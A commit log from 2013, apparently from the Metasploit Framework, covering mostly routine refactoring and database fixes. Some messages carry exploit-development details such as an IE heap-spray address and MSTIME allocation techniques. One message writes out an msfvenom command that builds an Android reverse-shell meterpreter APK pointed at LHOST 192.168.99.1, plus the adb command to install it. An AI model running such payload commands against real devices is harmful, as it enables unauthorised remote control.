After many tests, it turns out address 0x0c0d2020 is the most
consistent location acorss various IE versions. For dev purposes,
it's rather important to have this documented somewhere.
Thanks to corelanc0d3r for the data.
2013-06-07 00:28:22 -05:00
David Maloney
2e26256217
was missing a nil check
2013-06-04 14:21:07 -05:00
David Maloney
c4475538e7
Report on TaskSession associations
...
add TaskSession objects so when we report
on a session, we know what Task created it, if there
was a task
2013-06-04 13:42:36 -05:00
sinn3r
90117c322c
Landing #1874 - Post API cleanup
2013-05-31 16:15:23 -05:00
Luke Imhoff
cc60c95243
Rescue Errno::ENONENT when using File.mtime for memory cache
...
[#47720609 ]
2013-05-30 13:16:43 -05:00
Luke Imhoff
541d287e70
Merge branch 'master' into bug/module-load-cache-update
2013-05-30 12:59:50 -05:00
lsanchez-r7
8b488c3c6b
Merge pull request #1866 from dmaloney-r7/bug/mdm_session_port
...
Add session_port to the mdm object
SEERM #7281
2013-05-30 10:05:48 -07:00
James Lee
12f0448bb4
Use a LIKE test instead of equality
...
Fixes the ability to search for CVE (as well as other reference types)
with a non-exact match
[SeeRM #7989 ]
2013-05-29 16:27:33 -05:00
James Lee
f3ff5b5205
Factorize and remove includes
...
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
James Lee
0466cce7b1
Move PostMixin to its own file
...
Also replaces dead code in lib/msf/core/exploit/local.rb with what was
actually being used for the Exploit::Local class that lived in
lib/msf/core/exploit.rb.
2013-05-28 15:46:06 -05:00
Samuel Huckins
e20385dd9e
Merge pull request #1864 from dmaloney-r7/feature/task_associations/cred_service_host
...
Passes specs and functional tests
2013-05-28 12:11:57 -07:00
James Lee
9843dc4cb4
Land #1708 , android meterpreter
...
Conflicts:
data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
David Maloney
849d974463
Add session_port to the mdm object
...
Mdm::Session was not being passed the session_port
FIXRM #7281
2013-05-24 17:46:03 -05:00
Luke Imhoff
c22178752e
Merge branch 'master' into bug/module-load-cache-update
2013-05-24 11:06:16 -05:00
sinn3r
e169ccab4f
Landing #1862 - Remove inline unit tests
2013-05-23 22:19:29 -05:00
Luke Imhoff
1a487e476d
Merge branch 'master' into bug/module-load-cache-update
2013-05-23 14:23:14 -05:00
David Maloney
0f21861921
Add task handling to imports
...
allow imports to carry along task info
[Story #49167601 ]
2013-05-23 13:33:19 -05:00
Tod Beardsley
05916c079e
Inline unit tests are so last decade
...
Aside from codebase-wide changes, nearly all of these tests haven't been
touched since before 2010, and there is no effort to maintain this style
of testing. We've moved on to (correctly) seperating out our tests from
our codebase.
2013-05-23 12:41:14 -05:00
Tod Beardsley
a852304ba3
DRY: Move check things to the common module level
...
While it makes lots of sense to bring check to all modules, of course
some modules will not be able to actually use it. Namely modules like
nop and payload modules. If you're feeling creative, you could probably
come up with semantically similar checks for those, too.
2013-05-23 11:42:41 -05:00
Tod Beardsley
7436fdad72
First, copy-pasta and add a test
2013-05-23 11:26:53 -05:00
David Maloney
d8074c0bf4
Use create not new
...
Was calling .new instead of .create
[Story #49167601 ]
2013-05-22 18:29:22 -05:00
Luke Imhoff
2b70ec2e08
Payload compatible cache_in_memory
...
[#47720609 ]
Msf::PayloadSet#add_module does NOT return an annotated module class as
Msf::ModuleSet#add_module does because a payload module is defined as a
ruby Module instead of a ruby Class. Since add_module doesn't always
return an annotated_class, the logic in
Msf::ModuleManager#on_module_load needed to change to NOT use
annotated_class and create #add_module as return [void]. Thus, it is
necessary to pass in all the metasploit module metadata to
Msf::ModuleManager#cache_in_memory instead of assuming they can be
derived from the (payload) Module or (other) Class.
2013-05-22 16:06:02 -05:00
David Maloney
69dd7f5c58
Update Mdm and Add Task stuff to report
...
make report_* methods aware of Tasks
[Story #49167601 ]
2013-05-22 14:59:43 -05:00
Luke Imhoff
57576de85f
Update in-memory cache to fix file_changed?
...
[#47720609 ]
Msf::ModuleManager#module_info_by_path was not being updated when a
module was loaded, so if a load_module was called again, say during
start up of prosvc, the module would reload even though there was no
change in the file because file_changed? couldn't find an entry for the
module's path in module_info_by_path.
2013-05-22 12:28:42 -05:00
sinn3r
e2aad8930d
Landing #1853 - Remove ID tags
2013-05-22 12:12:55 -05:00
sinn3r
8483528ae0
Restore generic.rb to the correct state
2013-05-22 12:11:06 -05:00
sinn3r
1cf485fad1
Restore tcp.rb to its current state
2013-05-22 12:06:36 -05:00
Luke Imhoff
eede80509f
Reuse appropriate terminology in docs
...
[#47720609 ]
Fix some docs and variable names to make it clearer when methods are
expecting module instance and module classes. Change some 'name'
variables to 'reference_name' since that's the proper terminology.
2013-05-21 08:19:47 -05:00
James Lee
f4498c3916
Remove $Id tags
...
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
Luke Imhoff
89bd5b4791
Reset column information after running migrations
...
[#50179803 ]
[SeeRM #7967 ]
[SeeRM #7870 ]
Because metasploit-framework runs migrations with the same process and
with the same connection as it later accesses the database, the column
information can become cached prematurely and be incorrect by the end of
the migrations. Fix the bad cache by automatically resetting the column
information for all model classes after the migrations have run.
2013-05-20 13:08:07 -05:00
Luke Imhoff
398dcfa8cb
Merge branch 'master' into bug/migrations
2013-05-20 12:49:33 -05:00
Luke Imhoff
0e435d378c
Move Msf::DBManager#migrate(d) to module
...
[#50179803 ]
Move Msf::DBManager#migrate and the migrated attribute to
Msf::DBManager::Migration module to lower complexity of db_manager.rb
and in preparation for more migration related code on this branch.
2013-05-20 12:45:17 -05:00
Luke Imhoff
82867fbb66
Prevent duplicate migrations_paths
...
[#50099107 ]
If Msf::DBManager#initialize_metasploit_data_models is run multiple
times, such as during specs, ActiveRecord::Migrator.migrations_paths was
getting populated with multiple copies of the metasploit_data_models
db/migrate path, which would lead to 'DB.migrate threw an exception:
Multiple migrations have the version number 0' errors in framework.log.
2013-05-17 14:56:17 -05:00
James Lee
61afe1449e
Landing #1275 , bash cmdstager
...
Conflicts:
lib/rex/exploitation/cmdstager.rb
Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00
Tasos Laskos
0a55c7e4b6
Proofs can be omitted if they contain sensitive data
2013-05-14 20:46:17 +03:00
Tasos Laskos
a12e59ef1f
Merge branch 'master' into bug/web-match_and_log_fingerprint
2013-05-14 01:55:37 +03:00
Tasos Laskos
f4bc3096b2
#match_and_log_fingerprint: store match not fingerprint
2013-05-10 19:59:12 +03:00
Luke Imhoff
afa04ac9d0
Merge branch 'master' into feature/mdm-module-namespace
2013-05-09 16:13:06 -05:00
Luke Imhoff
bc92b43408
Update to metasploit_data_models 0.11.0
...
[#47979793 ]
2013-05-09 13:25:26 -05:00
Luke Imhoff
a5648a8830
Merge branch 'master' into feature/mdm-module-namespace
...
Conflicts:
Gemfile
Gemfile.lock
lib/msf/core/db_manager.rb
2013-05-08 13:22:41 -05:00
James Lee
9ab68ac935
Fix unintelligible error when importing empty file
...
IO#read returns nil for an empty file if given a length argument, which
caused a stack trace when attempting to import a file instead of a
useful error message.
2013-05-07 18:05:45 -05:00
James Lee
9e7885857c
Land #1776 , assembly payload blob cache fix
2013-05-02 16:58:14 -05:00
James Lee
0d9b120bac
Get rid of the suffix
...
This makes blob cache a little cleaner
[FixRM #7898 ]
2013-05-02 16:55:14 -05:00
jvazquez-r7
5cfc306466
Land @1785, @wchen-r7's API addition for the mstime ie8 technique
2013-05-02 00:00:49 -05:00
sinn3r
69f8103ffe
Make animatecolor element optional by using innerHTML
2013-05-01 14:21:52 -05:00
sinn3r
3d2cb9ec3f
Uses rand_text_hex for RGB values, and correcting exception handling
2013-05-01 13:41:36 -05:00
sinn3r
71afd762a9
According to MSFG, I can use RGB, so here goes
2013-04-30 18:48:21 -05:00
sinn3r
ae94fbdf6c
Updates documentation
2013-04-30 17:11:19 -05:00
sinn3r
9cc624456a
Adds function js_mstime_malloc
...
This function takes advantage of MSTIME's CTIMEAnimationBase::put_values
function that's suitable for a no-spray technique (based on wtfuzz's
PoC for MS13-008)
2013-04-30 16:40:10 -05:00
kernelsmith
cf7702f7e9
"acitve" should be "aggressive"
...
fixes http://dev.metasploit.com/redmine/issues/7926 which prevented a
proper search using:
msf> search exploit:type app:server
2013-04-30 13:04:19 -05:00
James Lee
906863676e
Fix a logic error in HttpServer
...
When a module is configured to listen on the INADDR_ANY interface, with
a payload that does not have an LHOST option, it attempts to determine
the srvhost from a client socket which would only be available when the
module has included the TcpClient mixin (i.e., it is both passive and
aggressive stance), causing a NameError for the undefined +sock+.
This commit fixes the problem in two ways:
1. It changes the default cli in get_uri to be the module's self.cli,
which should always be set when passive modules would need it (e.g., in
the on_request_uri method).
2. It adds a check to make sure that the calling module has a sock
before trying to get its peerhost. This was @marthieubean's suggested
solution in #1775 .
[Closes #1775 ]
2013-04-29 13:44:58 -05:00
Raphael Mudge
21f8e19d55
Single Payloads Cache Assembled Payload Improperly
...
An earlier change to the framework (prepend_migrate) forced single
payloads to use the internal_generate method of payload.rb.
internal_generate calls build which has a cache to track assembled
payloads. This method assumes that a payload only needs to be
assembled once, with optional values patched in later.
Single payloads do not work this way. Each time they are generated
new assembly source is created with the options hardcoded in.
This fix updates build to use the hashcode of the assembly code as
part of the cache key.
This fixes #7898 -- a bug that prevents a user from generating
multiple variations of a single payload without a restart.
2013-04-29 11:54:53 -04:00
Meatballs
8bfaa41723
Fix x64 dll creation
2013-04-27 20:44:46 +01:00
Luke Imhoff
249a09cd52
Update to metasploit_data_models 0.7.1
...
[#47979793 ]
2013-04-26 13:14:38 -05:00
sinn3r
b1e49e7116
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2013-04-25 20:54:28 -05:00
sinn3r
5b0ae1476b
Let's word this a little differently
2013-04-25 20:52:51 -05:00
Meatballs
b58a775af5
Added opt delay to file_dropper
2013-04-25 20:52:51 -05:00
sinn3r
008266a581
Corrects documentation. Thanks Meatballs1
2013-04-25 19:13:16 -05:00
sinn3r
ff87e3622b
Changes made according to feedback from Juan and James
2013-04-25 15:19:44 -05:00
James Lee
6767eee08a
Add in-line signing
...
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.
Example usage:
./msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
Luke Imhoff
24b97137ea
Msf::DBManager Mdm::Module* specs
...
[#47979793 ]
2013-04-25 09:46:53 -05:00
sinn3r
6642545551
Adds new JavaScript function "js_download"
...
"js_download" is a JavaScript function used to download data (text
or binary) from the web server.
2013-04-24 17:36:45 -05:00
Luke Imhoff
492b081280
Msf::DBManager::Export#extract_module_detail_info spec
...
[#47979793 ]
2013-04-20 16:44:42 -05:00
Luke Imhoff
e5befb7094
Msf::DBManager#report_session specs
...
[#47979793 ]
2013-04-19 10:11:33 -05:00
Tod Beardsley
25fcbd4e70
Landing #1733 , setting a sensible heapsray offset
...
@wchen-r7 says that nobody's using it today, much less relying on the
default, so this should make no functional difference to any browser
exploits.
2013-04-15 16:32:48 -05:00
Tod Beardsley
7f8040c4e4
Lands #1722 , Rex::Socket comment docs
2013-04-15 13:44:00 -05:00
Luke Imhoff
2c681005c0
Msf::ModuleManager::Cache spec coverage
...
[#47979793 ]
2013-04-15 13:08:12 -05:00
timwr
df9c5f4a80
remove unused resources and fix whitespace
2013-04-13 16:22:52 +01:00
scriptjunkie
2c41ca6598
Merge branch 'encoding_fix' of git://github.com/rsmudge/metasploit-framework
2013-04-12 21:10:44 -05:00
sinn3r
d28db8a2a3
Forgot the comment
2013-04-12 20:21:10 -05:00
sinn3r
f2cbbf43e8
Changes default offset
...
Points to the beginning of the block
2013-04-12 20:19:47 -05:00
timwr
32bd812bdb
android meterpreter
2013-04-12 18:57:04 +01:00
RageLtMan
6eb33ae5ed
Rex::Socket::SslTcp set cipher and verify_mode
...
Update Rex::Socket::SslTcp to accept verification mode string from
Rex::Socket::Parameters, which has been modified accordingly.
Add SSLVerifyMode and SSLCipher options (params and socket work
were done before, but the option was not exposed) to
Msf::Exploit::Tcp.
Testing:
```
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'NONE')
>> sock.sslctx.verify_mode
=> 0
>> sock.close
=> nil
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'PEER')
=> #<Socket:fd 13>
>> sock.sslctx.verify_mode
=> 1
```
Note: this should be able to resolve the recent SSL socket hackery
of exploit/linux/misc/nagios_nrpe_arguments.
2013-04-11 18:00:33 -04:00
James Lee
6a0b240d10
Add some better docs for Rex::Socket
2013-04-10 12:41:41 -05:00
Rob Fuller
2949c4a339
enable stage encoding for reverse_http(s)
2013-04-10 12:10:17 -03:00
Tod Beardsley
6a5d318749
Bumping version.
2013-04-10 08:59:56 -05:00
James Lee
cd86a69090
Have Post::File use shiny new session.fs.file.mv
...
Also adds a quick and dirty test. Verified working on Linux shell, Linux
meterpreter, and Windows x86 and x64 meterpreter.
2013-04-05 01:24:24 -05:00
Luke Imhoff
809969b49f
Merge branch 'master' into feature/patchable-web-vuln-import
2013-04-02 22:38:54 -05:00
Luke Imhoff
0bb79ba890
Msf::DBManager#import_msf_xml refactor
...
[#46491831 ]
Move Msf::DBManager#import_msf_xml into
Msf::DBManager::ImportMsfXml#import_msf_xml and include
Msf::DBManager::ImportMsfXml to cut down size of the infamous db.rb.
Break up #import_msf_xml to have separate methods for parsing web_forms,
web_pages, and web_vulns. The method for
web_vulns, #import_msf_web_vuln_element is needed so that it can be overridden in
Pro to handle the Pro-only changes to Mdm::WebVuln.
2013-04-01 16:06:40 -05:00
Luke Imhoff
2317e9cced
Fix yard tag warnings
...
[#46491831 ]
2013-03-30 17:13:12 -05:00
Luke Imhoff
7ed2812ec3
Fix Cannot resolve link YARD warnings
...
[#46491831 ]
2013-03-30 16:58:49 -05:00
Luke Imhoff
c210260845
Fix Undocumentable method, missing name YARD warning
...
[#46491831 ]
Comments at the start of the file with ## caused YARD to think the
comment was documenting the require call. By removing the ##, the
warning disappeared. I did not determine what is special about ## in
file comments.
2013-03-30 15:32:38 -05:00
sinn3r
463725efec
Merge branch 'bug/winrm_poke' of github.com:dmaloney-r7/metasploit-framework into dmaloney-r7-bug/winrm_poke
2013-03-29 09:30:21 -05:00
Tasos Laskos
380f5f56ae
Auxiliary::Web::HTTP#_request: print_error => elog
...
[SEERM #7839 ]
Reverted earlier commit.
2013-03-27 16:36:50 +02:00
David Maloney
a87e414274
fix winrm poke method
2013-03-26 13:05:33 -05:00
David Maloney
509ae76dc9
make sure we grab the workspace for store_local
...
store_local calls report note from db.rb directly instead of going
through the report method. this means we might miss the workspace
causing a stack trace
2013-03-22 16:52:38 -05:00
sinn3r
0634cb9892
Need to avoid badchar 0x00
...
0x00 becomes double null, which functions like a terminator
2013-03-22 13:18:32 -05:00
sinn3r
566806487c
Randomize the "div_container" var because it's global
...
It's best to randomize this variable name because it's global.
2013-03-22 13:16:14 -05:00
sinn3r
1ac31a3e12
Merge branch 'bug/web-path-api-update' of github.com:tasos-r7/metasploit-framework into tasos-r7-bug/web-path-api-update
2013-03-22 12:54:23 -05:00
sinn3r
cce74246d8
Merge branch 'master' of github.com:rapid7/metasploit-framework
2013-03-19 15:03:24 -05:00
Tasos Laskos
11c38d925b
Auxiliary::Web::Path: Fuzzable API update
...
[FIXRM #7817 ]
Path object was using an outdated fuzzable API which was causing
scan errors.
2013-03-19 18:41:52 +02:00
Tasos Laskos
ad39a5cdc3
Auxiliary::Web::HTTP#_request: elog => print_error
...
[SEERM #7815 ]
Switched form elog to print_error to make reporting bugs easier on users.
2013-03-19 17:18:44 +02:00
Tod Beardsley
afcbaffa2b
Revert "add -R capability like hosts -R"
...
Pulling out the set_rhosts_from_addrs -- that's not required for
grep-like functionality, and adding this method to the global namespace
is undesirable.
This reverts commit 52596ae3b4
.
2013-03-18 15:28:19 -05:00
Tod Beardsley
91e3f4cca6
Merge 'kernelsmith/msfconsole-grep'
...
Resolved a conflict between grep and go_pro (go_pro was added after
grep). Adds @kernelsmith's grep command. Josh is determined to have
msfconsole be his default shell, it seems.
[Closes #1320 ]
Conflicts:
lib/msf/ui/console/command_dispatcher/core.rb
2013-03-18 14:39:45 -05:00
Luke Imhoff
2075a7b46c
Remove active_record patch
...
[#46141013 ]
Version 3.2.12 of activerecord contains the changes that the original
patch made so the patch is no longer needed.
2013-03-18 11:32:21 -05:00
Meatballs
f9327d169b
msftidy
2013-03-17 14:31:40 -04:00
Meatballs
b6da5f84bb
Refactor
2013-03-17 14:09:00 -04:00
Tasos Laskos
5967991f6f
Auxiliary::Web#log_*: details[:category] => #name
...
Recent category updates to modules caused variations of vulns of the
same type to be ignored leading to a smaller exploitation surface.
Thus, use the #name of the module as the key instead of the category name.
2013-03-12 19:43:47 +02:00
Tasos Laskos
c641ca96c1
Auxiliary::Web::Path.from_model: inputs => form.inputs
...
Fixed uninitialized variable error.
2013-03-11 23:08:41 +02:00
Raphael Mudge
d764740779
Convert user/pass tokens to ASCII in db.rb
...
This commit fixes an Encoding::CompatibilityError incompatible
encoding regexp match (ASCII-8BIT regexp with UTF-8 string) when
sanitizing non-printable tokens from a user/pass string.
The UTF-8 strings are derived from strings passed through the
module.execute RPC call.
2013-03-11 15:02:28 -04:00
Meatballs
756dec6fcc
Msftidy EXE
2013-03-10 20:56:21 +00:00
Meatballs
71a38b81dd
Added generation to Exploit::EXE
2013-03-10 20:54:37 +00:00
Tasos Laskos
7e15788bb5
Auxiliary::Web: updated form of vuln storage in parent
...
#log_fingerprint and #log_resource now create a key in the
parent's #vulns attribute with the name of the vuln type and
store the details of each such vuln under it.
2013-03-08 22:38:23 +02:00
Spencer McIntyre
8b5a83c7f5
Remove the DECODER option
2013-03-08 15:25:16 -05:00
Tasos Laskos
ac6065d8f9
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-08 21:50:49 +02:00
Tasos Laskos
3422a7c098
Auxiliary::Web: force vuln proof to_s
2013-03-08 21:50:01 +02:00
Spencer McIntyre
aceba9fc8a
Revert "escape ticks and spaces in paths"
...
This reverts commit 4c87b1ba36
.
2013-03-08 14:37:28 -05:00
James Lee
db676f1a88
Whitespace at EOL
2013-03-07 18:20:08 -06:00
Tasos Laskos
cf3df4b179
Auxiliary::Web::HTTP: added error output
...
Instead of using elog when an HTTP request callback throws an
exception, use the HTTP class' parent #print_error.
2013-03-07 20:14:38 +02:00
Tasos Laskos
d9a6f5f0ca
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-06 18:26:18 +02:00
Tasos Laskos
c497d5ffef
Auxiliary::Web: log methods pass vuln info to parent
2013-03-06 18:25:25 +02:00
Samuel Huckins
09fc52f3d9
Merge pull request #1536 from rapid7/feature/active-record-migrator-migrations-paths
...
Use ActiveRecord::Migrator multiple migrations paths support
2013-03-06 08:20:36 -08:00
James Lee
24c0da0adb
Merge branch 'rapid7' into doc/cleanup-peparsey
2013-03-05 21:00:26 -06:00
James Lee
27727df415
Merge branch 'R3dy-psexec-mixin2' into rapid7
2013-03-05 14:36:55 -06:00
James Lee
a928e5f963
Whitespace
2013-03-05 14:34:56 -06:00
David Maloney
f5c23e4b02
fix typo snaffu
2013-03-05 12:35:21 -06:00
David Maloney
1407886e83
Revert "fix a major typo snaffu"
...
This reverts commit c639de7ccc
.
2013-03-05 12:34:51 -06:00
David Maloney
c639de7ccc
fix a major typo snaffu
2013-03-05 12:33:37 -06:00
James Lee
ac63965e4d
Merge remote-tracking branch 'gerry/nbe_importing_fix' into rapid7
2013-03-04 20:00:50 -06:00
James Lee
c0689a7d43
Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7
2013-03-04 12:14:33 -06:00
David Maloney
6dcca7df78
Remove duplicated header issues
...
Headers were getting duped back into client config, causing invalid
requests to be sent out
2013-03-04 11:24:26 -06:00
Luke Imhoff
0ddc6b3afa
Document Msf::DBManager#initialize_metasploit_data_models
2013-03-02 21:16:02 -06:00
Luke Imhoff
c9a162ac33
Correct return type of Msf::DBManager#migrate.
2013-03-02 21:09:45 -06:00
Luke Imhoff
af4b3fa287
Use ActiveRecord::Migrator multiple migrations paths support
...
[#44034071 ]
ActiveRecord::Migrator has a class attribute, migrations_paths,
specificially for storing a list of different directories that have
migrations in them. ActiveRecord::Migrator.migrations_paths is used in
rake db:load_config, which is a dependency of db:migrate, etc. that is
passed to ActiveRecord::Migrator.migrate. Since migrate supports an
array of directories, and not just a single directory, there is no need
to merge all the migrations paths into one temporary directory as was
previously done.
2013-03-02 20:33:48 -06:00
Samuel Huckins
2e4760c486
Merge pull request #1533 from rapid7/feature/migrations-in-metasploit_data_models
...
All steps passing as described.
2013-03-01 12:54:41 -08:00
Tasos Laskos
99a8ec593b
Fixing merge conflicts
2013-03-01 20:21:02 +02:00
David Maloney
4212c36566
Fix up basic auth madness
2013-03-01 11:59:02 -06:00
Samuel Huckins
7b8654a71d
Revert "Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence"
...
This reverts commit 3840ddccbc
, reversing
changes made to e1891f0836
.
2013-03-01 11:41:06 -06:00
Samuel Huckins
3840ddccbc
Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence
...
Auxiliary::Web: fixed confidence calculation in log methods
2013-03-01 09:25:07 -08:00
Tasos Laskos
862b813786
Auxiliary::Web: fixed confidence calc in log methods
2013-03-01 18:33:16 +02:00
Luke Imhoff
239e1934b8
Use migrations from metasploit_data_models
...
[#44034071 ]
metasploit_data_models version 0.5.0 copied the migrations from
metasploit-framework/data/sql/migrate to
metasploit_data_models/db/migrate so that specs could be written the Mdm
models in metasploit_data_models. As part of the specs, :null => false
columns that should be :null => true were discovered, so a new migration
was added, but to metasploit_data_models/db/migrate, so it could be
tested. Instead of replicating migrations back and forth, I'm removing
the migrations completely from metasploit-framework and changing the
default migration path in Msf::DbManager#migration_paths to
MetasploitDataModels.root.join('db', 'migrate').
2013-03-01 09:03:45 -06:00
David Maloney
c290bc565e
Merge branch 'master' into feature/http/authv2
2013-02-28 14:33:44 -06:00
sinn3r
18c0bb0ac8
Updates description again
2013-02-28 11:34:48 -06:00
sinn3r
8cb5da0794
One size rules them all.
2013-02-28 11:21:23 -06:00
sinn3r
722e077029
Update generic target
2013-02-28 11:09:52 -06:00
sinn3r
2c013cada8
Update documentation for default values
2013-02-28 11:05:18 -06:00
sinn3r
86d78939ad
Make objId optional
2013-02-28 11:01:15 -06:00
sinn3r
9f35452d73
Beef up the default values for precise alloc size and consistency
2013-02-28 10:35:40 -06:00
sinn3r
bb02dc43b3
Documentation
2013-02-27 15:34:21 -06:00
sinn3r
312638d6a5
Correct allocation size for IE10
2013-02-27 14:32:39 -06:00
sinn3r
e3f0757304
Improved version thanks to corelanc0d3r
2013-02-27 14:08:57 -06:00
sinn3r
2a7b4ee3d8
Merge branch 'master' into setstringproperty_spray
2013-02-27 11:15:52 -06:00
Gerry Eisenhaur
724b32af17
Fixed the importing of NBE files
2013-02-26 16:55:26 -08:00
sinn3r
38af8ba866
Merge branch 'feature/sqli-exploitation-mssql' of github.com:tasos-r7/metasploit-framework into tasos-r7-feature/sqli-exploitation-mssql
2013-02-26 13:41:32 -06:00
Tasos Laskos
0421cff913
Exploit::Remote::Web#perform_request: timeout set to 10
2013-02-25 19:49:39 +02:00
HD Moore
9d9d83cf8b
Implement per-target arch/platform searches SeeRM #7754
2013-02-24 11:06:29 -06:00
sinn3r
aa007b9e0a
Updates
2013-02-22 20:07:16 -06:00
Meatballs
07475e5483
Update
2013-02-22 21:22:51 +00:00
sinn3r
56fa5ead37
Initial version of js_property_spray
2013-02-22 10:21:20 -06:00
James Lee
c423ad2583
Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7
2013-02-21 15:30:43 -06:00
David Maloney
ac6fdf24a2
Fix winrm mixin from revert merge
2013-02-19 22:01:43 -06:00
David Maloney
b2563dd6c2
trying to clean up the mess from the revert
2013-02-19 21:25:37 -06:00
Tod Beardsley
3949c851a4
Was, indeed, missing an or pipe
2013-02-19 17:53:48 -06:00
Tod Beardsley
d81f177ab6
Adding Nemski's fix
...
[FixRM #7451 ]
2013-02-19 17:51:51 -06:00
James Lee
4703278183
Move SMB mixins into their own directory
2013-02-19 12:55:06 -06:00
James Lee
ede804e6af
Make psexec mixin a bit better
...
* Removes copy-pasted code from psexec_command module and uses the mixin
instead
* Uses the SMB protocol to delete files rather than psexec'ing to call
cmd.exe and del
* Replaces several instances of "rescue StandardError" with better
exception handling so we don't accidentally swallow things like
NoMethodError
* Moves file reading and existence checking into the Exploit::SMB mixin
2013-02-19 12:33:19 -06:00
James Lee
b72d2b59f8
Add logging in case of exceptions during rm
2013-02-18 18:02:51 -06:00
James Lee
0938190063
Merge branch 'rapid7' into R3dy-psexec-mixin2
2013-02-17 06:08:09 -06:00
James Lee
aea76a56de
Add some docs to FtpServer
2013-02-13 14:39:19 -06:00
Tod Beardsley
8ddc19e842
Unmerge #1476 and #1444
...
In that order. #1476 was an attempt to salvage the functionality, but
sinn3r found some more bugs. So, undoing that, and undoing #1444 as
well.
First, do no harm. It's obvious we cannot be making sweeping changes in
libraries like this without a minimum of testing available. #1478 starts
to address that, by the way.
FixRM #7752
2013-02-11 20:49:55 -06:00
nemski
b8b445c834
Update lib/msf/core/auxiliary/login.rb
...
Fix for Bug #7451
2013-02-09 15:32:47 +11:00
James Lee
99218d142b
Merge branch 'rapid7' into R3dy-psexec-mixin2
2013-02-08 12:48:06 -06:00
James Lee
5b3b0a8b6d
Merge branch 'dmaloney-r7-http/auth_methods' into rapid7
2013-02-08 12:45:35 -06:00
James Lee
2b3c8a68ad
Merge remote-tracking branch 'tasos-r7/feature/web_http_request_opts_override' into rapid7
2013-02-08 12:45:02 -06:00
James Lee
d2c7dbe160
Merge remote-tracking branch 'wchen-r7/type_error_dir_scanner' into rapid7
2013-02-08 12:39:08 -06:00
sinn3r
8798567d79
Fix bug: TypeError can't convert Fixnum into String
...
wmap_target_port is retrieved from datastore['RPORT'], and that's a
Fixnum. But wmap_base_url is treating that like a String, so when a
module uses that function, it's doomed.
See:
http://dev.metasploit.com/redmine/issues/7748
2013-02-08 12:05:27 -06:00
James Lee
071df7241b
Merge branch 'rapid7' into sonicwall_gms
...
Conflicts:
modules/exploits/multi/http/sonicwall_gms_upload.rb
Adds a loop around triggering the WAR payload, which was causing some
unreliability with the Java target.
2013-02-07 21:53:49 -06:00
James Lee
e535a3e93f
Guard against running broken method on non-windows
...
This just puts a bandaid around the issue and makes it so FileDropper
doesn't completely break java and posix meterpreter sessions.
[SeeRM #7721 ]
2013-02-07 21:10:27 -06:00
James Lee
16a0ab1933
Fix comment link and some whitespace
2013-02-07 18:37:11 -06:00
James Lee
13d1045989
Works for java and native linux targets
2013-02-07 16:56:38 -06:00
Tasos Laskos
b3e828359d
Web::HTTP#_request: allow Rex opt level overrides
...
Allow overriding options at the Rex level when performing requests
via the Auxiliary::Web::HTTP wrapper.
2013-02-06 01:02:46 +02:00
David Maloney
877fb017b6
remove negotiate requirements
...
winrm can support basic, and now these modules can too, for free
2013-02-04 16:50:43 -06:00
David Maloney
44d4e298dc
Attempting to cleanup winrm auth
2013-02-04 15:48:31 -06:00
David Maloney
c71b803413
Add invisible auth to web crawler
...
the anemone web crawler now properly supports our invisible auth scheme
for rex http.
2013-02-04 14:38:08 -06:00
David Maloney
413c37e506
Add invisible auth to Web::HTTP
...
add the invisible auth support to tasos' http class
2013-02-04 13:39:40 -06:00
David Maloney
0c57026065
Remove junk added earlier
...
i added junk to tasos' class when we were going to attempt this a
different way. housekeeping to clean it up
2013-02-04 13:13:08 -06:00
David Maloney
8d013d1034
Merge branch 'master' into http/auth_methods
2013-02-04 13:11:57 -06:00
David Maloney
9497e38ef7
Fix http login scanner
...
Fix the http_login scanner to use new buitin auth
2013-02-04 12:31:19 -06:00
Royce Davis
7faaa635d3
Fixed exception handling to use smb::proto
2013-02-03 18:46:41 -06:00
HD Moore
797e2604a0
Fix missing require in reverse_tcp_ssl
2013-02-03 17:41:45 -06:00
RageLtMan
ffb88baf4a
initial module import from SV rev_ssl branch
2013-02-03 15:06:24 -05:00
HD Moore
c3801ad083
This adds an openssl CMD payload and handler
2013-02-03 04:44:25 -06:00
David Maloney
61969d575b
remove mixin require, more datastore clenaup
2013-02-01 15:12:11 -06:00
David Maloney
efe0947286
Start fixing datastore options
2013-02-01 15:12:11 -06:00
David Maloney
ef1fc58e5e
Remove mixin, start moving into Rex
...
move auth awareness into rex itself
2013-02-01 15:12:11 -06:00
David Maloney
c407fa9e74
add mixjn
2013-02-01 15:12:11 -06:00
David Maloney
5814c59620
move httpauth to mixin
...
HttpAuth stuff gets it's own little mixin
mix it in to Exploit::Http::Client
mix in it to Auxiliary::Web::HTTP
2013-02-01 15:12:10 -06:00
David Maloney
8e870f3654
merge in sinn3r's changes
2013-02-01 15:12:10 -06:00
jvazquez-r7
174ab31010
Moving reused methods to Accounts mixin
2013-01-31 12:59:55 +01:00
sinn3r
95cc84f5e8
Updates normalize_uri()
...
This function should not remove the trailing slash, because you may
end up getting a different HTTP response. The new function also
allows multiple URIs as argument, and will just merge & normalize
them together. [SeeRM #7733 ]
2013-01-30 15:42:21 -06:00
Tod Beardsley
6002e35460
Merge pull request #1397 from wchen-r7/target_uri_fix
...
normalize_uri fixes (double slashes and trailing slash)
2013-01-29 11:26:30 -08:00
Tod Beardsley
c42d4a6617
Merge for CVE-2013-0156 RoR Exploit
...
Also massages the RUBY payload.
2013-01-28 23:06:05 -06:00
James Lee
92c736a6a9
Move fork stuff out of exploit into payload mixin
...
Tested xml against 3.2.10 and json against 3.0.19
